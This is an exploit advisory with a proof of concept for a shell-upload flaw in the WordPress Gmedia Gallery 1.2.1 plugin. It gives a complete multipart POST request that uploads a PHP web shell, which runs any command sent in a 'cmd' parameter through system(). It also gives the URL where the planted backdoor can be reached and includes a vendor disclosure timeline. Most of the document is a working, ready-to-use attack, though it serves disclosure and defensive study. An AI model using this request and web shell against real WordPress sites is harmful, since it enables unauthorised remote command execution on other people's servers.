######################
# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.codeasily.com/

# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip

# Date : 2014-08-01

# Tested on : Windows 7 / Mozilla Firefox

######################

# Description :  

Any user could upload php files (administrator by default).

######################

# Vulnerability Disclosure Timeline:

2014-08-01:  Discovered vulnerability
2014-08-01:  Vendor Notification (Twitter)
2014-08-01:  Vendor Response/Feedback 
2014-08-02:  Vendor Fix/Patch 
2014-08-02:  Public Disclosure 

######################

# PoC:

POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"

.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"

0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"

1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"

terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>



-----------------------------304431219031197--


Backdoor location:

http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd


#####################

Discovered By : Claudio Viviani
        	http://www.homelab.it
        	info@homelab.it
        	homelabit@protonmail.ch

        	https://www.facebook.com/homelabit
        	https://twitter.com/homelabit
        	https://plus.google.com/+HomelabIt1/

#####################